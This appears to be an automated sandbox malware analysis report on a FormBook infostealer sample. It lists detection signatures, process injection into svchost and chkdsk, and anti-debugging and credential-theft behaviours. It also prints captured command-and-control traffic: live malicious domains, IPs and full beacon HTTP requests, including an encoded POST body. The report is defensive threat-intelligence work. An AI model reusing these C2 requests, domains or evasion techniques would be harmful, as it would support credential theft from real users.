Edit tour

Windows Analysis Report
bIcqeSVPW6.exe

Overview

General Information

Sample name:	bIcqeSVPW6.exe renamed because original name is a hash value
Original sample name:	27bc352c485ac59da456735b5418f08abd0d606ef69e4b18b4a720fe9074b1e7.exe
Analysis ID:	1589079
MD5:	eeb8a8cd64ecc9e96b0c4cde2072681c
SHA1:	13fde96c3b53d115585c339da5595741cfddc1df
SHA256:	27bc352c485ac59da456735b5418f08abd0d606ef69e4b18b4a720fe9074b1e7
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

bIcqeSVPW6.exe (PID: 1728 cmdline: "C:\Users\user\Desktop\bIcqeSVPW6.exe" MD5: EEB8A8CD64ECC9E96B0C4CDE2072681C)

svchost.exe (PID: 6296 cmdline: "C:\Users\user\Desktop\bIcqeSVPW6.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

qcjVHvcmgHQ.exe (PID: 3756 cmdline: "C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

chkdsk.exe (PID: 352 cmdline: "C:\Windows\SysWOW64\chkdsk.exe" MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)

firefox.exe (PID: 3016 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1702544011.00000000004D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3319370482.0000000005630000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3319323904.00000000055E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3324169649.0000000006CC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3318079583.0000000005080000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1703561585.0000000004750000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1703177843.0000000002D50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3319443230.0000000003870000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.4d0000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.4d0000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\bIcqeSVPW6.exe", CommandLine: "C:\Users\user\Desktop\bIcqeSVPW6.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\bIcqeSVPW6.exe", ParentImage: C:\Users\user\Desktop\bIcqeSVPW6.exe, ParentProcessId: 1728, ParentProcessName: bIcqeSVPW6.exe, ProcessCommandLine: "C:\Users\user\Desktop\bIcqeSVPW6.exe", ProcessId: 6296, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\bIcqeSVPW6.exe", CommandLine: "C:\Users\user\Desktop\bIcqeSVPW6.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\bIcqeSVPW6.exe", ParentImage: C:\Users\user\Desktop\bIcqeSVPW6.exe, ParentProcessId: 1728, ParentProcessName: bIcqeSVPW6.exe, ProcessCommandLine: "C:\Users\user\Desktop\bIcqeSVPW6.exe", ProcessId: 6296, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: bIcqeSVPW6.exe	ReversingLabs: Detection: 83%
Source: bIcqeSVPW6.exe	Virustotal: Detection: 52%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1702544011.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3319370482.0000000005630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3319323904.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3324169649.0000000006CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3318079583.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1703561585.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1703177843.0000000002D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3319443230.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: bIcqeSVPW6.exe

Joe Sandbox ML: detected

Source: bIcqeSVPW6.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: chkdsk.pdbGCTL source: svchost.exe, 00000002.00000003.1669406047.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1703039846.0000000002A00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qcjVHvcmgHQ.exe, 00000004.00000002.3318882784.00000000008CE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: chkdsk.pdb source: svchost.exe, 00000002.00000003.1669406047.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1703039846.0000000002A00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: bIcqeSVPW6.exe, 00000000.00000003.1478411296.0000000003530000.00000004.00001000.00020000.00000000.sdmp, bIcqeSVPW6.exe, 00000000.00000003.1477043674.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1703230885.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606254379.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1703230885.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1604144030.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000003.1705453958.000000000569A000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319493838.00000000059DE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319493838.0000000005840000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000003.1702372197.00000000054E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bIcqeSVPW6.exe, 00000000.00000003.1478411296.0000000003530000.00000004.00001000.00020000.00000000.sdmp, bIcqeSVPW6.exe, 00000000.00000003.1477043674.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1703230885.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606254379.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1703230885.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1604144030.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000005.00000003.1705453958.000000000569A000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319493838.00000000059DE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319493838.0000000005840000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000005.00000003.1702372197.00000000054E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: qcjVHvcmgHQ.exe, 00000004.00000002.3322963977.000000000488C000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319945189.0000000005E6C000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3318382305.00000000053F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2002761848.000000003A07C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: qcjVHvcmgHQ.exe, 00000004.00000002.3322963977.000000000488C000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319945189.0000000005E6C000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3318382305.00000000053F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2002761848.000000003A07C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A56CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00A56CA9
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A560DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_00A560DD
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A563F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_00A563F9
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A5EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A5EB60
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A5F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00A5F5FA
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A5F56F FindFirstFileW,FindClose,	0_2_00A5F56F
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A61B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A61B2F
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A61C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A61C8A
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A61F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A61F94
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 5_2_0509C540 FindFirstFileW,FindNextFileW,FindClose,	5_2_0509C540

Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4x nop then xor eax, eax	4_2_06CD9C90
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4x nop then pop edi	4_2_06CD6492
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4x nop then pop edi	4_2_06CE50E7
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Code function: 4x nop then pop edi	4_2_06CE50AE
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then xor eax, eax	5_2_05089E80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_057304E8

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.rtpnagitavip.xyz
Source:	DNS query: www.dating-apps-az-dn5.xyz
Source:	DNS query: www.soainsaat.xyz

Source: Joe Sandbox View	IP Address: 103.21.221.4 103.21.221.4
Source: Joe Sandbox View	IP Address: 209.74.77.109 209.74.77.109

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A64EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00A64EB5

Source: global traffic	HTTP traffic detected: GET /1e5v/?3DkHhn=LSevH1SlR8jKR63Sf3e6iJP8FgOuKv9VRJH5n/Y57ceZ6zxK2PAgiO3wYjZDkthnMdw+Rr81pHZPvK3KWmaSywZBPBYkXMXczB8dWZqH7PW/MoMlf4MIAK6HI0AhKSB4pw==&jH4x=86JHl HTTP/1.1Host: www.yunlekeji.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /sa6l/?3DkHhn=6V1asWS7bHNCa/2zAtOgIvo5xGUX2YN7Fz16JDlX+WOPPCMQtYaavk317PXImbN/OUG48/wNZlwOwdeReLWvD6PYMjqtuTDNT7c8ZTd5cxBCZsjQlYSG4pUhurPexOX1dg==&jH4x=86JHl HTTP/1.1Host: www.rafconstrutora.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /27lg/?jH4x=86JHl&3DkHhn=XHd59GHbUnAySavE+VYtb0oRW1QdwhWNcR79gJCiA4T47CJUdda4m3KOv2gLYrZW1RokSNrWwPitVihkA4IERdP5BfSklenz4vUF3jCdjthznzOB1JrNNJokaKrslHPJFg== HTTP/1.1Host: www.rtpnagitavip.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /pygh/?3DkHhn=ilO/4vqZmQYrpwPPFa4t8e1nNqm6CsSV7Cv28Gr+0e5NDs7N6pcA+3a3+3Ovna0xpHwPFTpZZrsm+pOkWjhKiv20scVBFeiNJHZi5P3lJ6QcAPGU/PVqaGZOMv9wS1Aqmw==&jH4x=86JHl HTTP/1.1Host: www.windsky.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /m85b/?3DkHhn=RTKlsIHwI0zh00zNoZz82n6YKC/FVn63bGL7eLxLdINoTiozmJDsVcxe+nKMoKClO37Gg1Am4qT+EilmX6Glt3+WO5cQJZz5qMzXuYr/wgoBbWBPZiwEopFeQ3Q/Mtz8GQ==&jH4x=86JHl HTTP/1.1Host: www.luxuryliving.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /8fw9/?jH4x=86JHl&3DkHhn=gtoYIMxc4wYwq9NPYFjSszTDPRf8MDoa911P7+bnEwIzn/+NgM97Q9dqk2PkQokDelqcKS+c9CYn/WPq5HMlXHH5MMUCc4tUxwGXuy1eGCrmBFPJkxXRRohM9/tBd2Opyg== HTTP/1.1Host: www.dating-apps-az-dn5.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /l03t/?3DkHhn=+9BKYrTO+vJXrUQOGHL0VAaKc2zJijozXdE03+pH7bI8lw2q1SksIpXkrtcR3646NgDj8ak0/OWJjttr6L+cUN80K7t0/Vsr8uZoIlGR8251DEoyq21C4q4re5ntRuh1QQ==&jH4x=86JHl HTTP/1.1Host: www.tempatmudisini06.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /m36v/?3DkHhn=CFkAe3bFRt+WilFZUe5RqpuEyYe1T1ptTc7TrLcgXQSc7eL8d/sZYyILGDP2RZgGroaVNOLO4IzoQck32bc7MIdSPZAP+UMCVlLrdJlLVobFhTJLH0tY4N2Qcf3rQI4NHA==&jH4x=86JHl HTTP/1.1Host: www.7261ltajbc.bondAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /jhf5/?3DkHhn=X47VSHjA7Ra6hBgR1eJb6pHvwL8UYAxuv5evRVNTAMu+fw462P/7SsFxa6WZOMbinD7w009mibInuncktbKjofctyMBEnZDK39OjLQRAxIrXDibUuqiVHbgJGblCqHQhVA==&jH4x=86JHl HTTP/1.1Host: www.mycleanupfiesta.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.yunlekeji.top
Source: global traffic	DNS traffic detected: DNS query: www.rafconstrutora.online
Source: global traffic	DNS traffic detected: DNS query: www.rtpnagitavip.xyz
Source: global traffic	DNS traffic detected: DNS query: www.windsky.click
Source: global traffic	DNS traffic detected: DNS query: www.joube.shop
Source: global traffic	DNS traffic detected: DNS query: www.luxuryliving.website
Source: global traffic	DNS traffic detected: DNS query: www.dating-apps-az-dn5.xyz
Source: global traffic	DNS traffic detected: DNS query: www.tempatmudisini06.click
Source: global traffic	DNS traffic detected: DNS query: www.7261ltajbc.bond
Source: global traffic	DNS traffic detected: DNS query: www.mycleanupfiesta.live
Source: global traffic	DNS traffic detected: DNS query: www.uynline.shop
Source: global traffic	DNS traffic detected: DNS query: www.soainsaat.xyz

Source: unknown

HTTP traffic detected: POST /sa6l/ HTTP/1.1Host: www.rafconstrutora.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflateOrigin: http://www.rafconstrutora.onlineReferer: http://www.rafconstrutora.online/sa6l/Connection: closeContent-Length: 207Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36Data Raw: 33 44 6b 48 68 6e 3d 33 58 64 36 76 69 71 62 42 6e 39 58 66 62 32 6d 44 39 6e 6e 4f 39 30 30 79 69 6b 50 33 4c 51 79 47 78 45 35 48 30 46 62 35 7a 47 71 55 68 51 73 68 4a 7a 6e 68 58 58 79 79 2f 47 4b 2f 72 5a 6c 45 48 37 6f 38 64 38 2f 4a 67 74 45 77 4d 75 64 53 4b 58 6a 49 4f 2b 6b 4a 77 79 38 35 6a 44 75 43 49 67 4f 55 43 51 4d 44 79 74 69 45 73 6d 2f 6a 4c 6a 59 76 49 67 65 72 34 44 4b 6b 63 32 66 49 65 64 79 37 6c 54 32 78 38 6f 47 63 56 63 4b 67 68 51 61 70 4f 48 42 34 72 72 37 75 75 52 79 50 50 48 37 6d 6c 51 4b 74 61 66 75 76 65 6f 4e 46 30 58 51 75 4e 78 74 62 71 73 57 54 36 57 59 71 44 48 6e 74 4f 4d 3d Data Ascii: 3DkHhn=3Xd6viqbBn9Xfb2mD9nnO900yikP3LQyGxE5H0Fb5zGqUhQshJznhXXyy/GK/rZlEH7o8d8/JgtEwMudSKXjIO+kJwy85jDuCIgOUCQMDytiEsm/jLjYvIger4DKkc2fIedy7lT2x8oGcVcKghQapOHB4rr7uuRyPPH7mlQKtafuveoNF0XQuNxtbqsWT6WYqDHntOM=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:22:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sRODIRfizkCkgB5TKw2W1JuFE4Ua4eTV1kElkibAvZh6VK0eEsp2IdC3WXaXo3DyMtD%2FzaqBom8yDrxuTT47P4BnUE6lw5o%2Bd8aNGA3Ik7EHnAwB7w4hQ5hDnPQeYYgv9jTby11T5nwyVSFY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90037f86ff2f4344-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1735&rtt_var=867&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=748&delivery_rate=0&cwnd=45&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 d8 fc 81 9c 88 49 d4 4d a2 a7 32 a7 f3 01 73 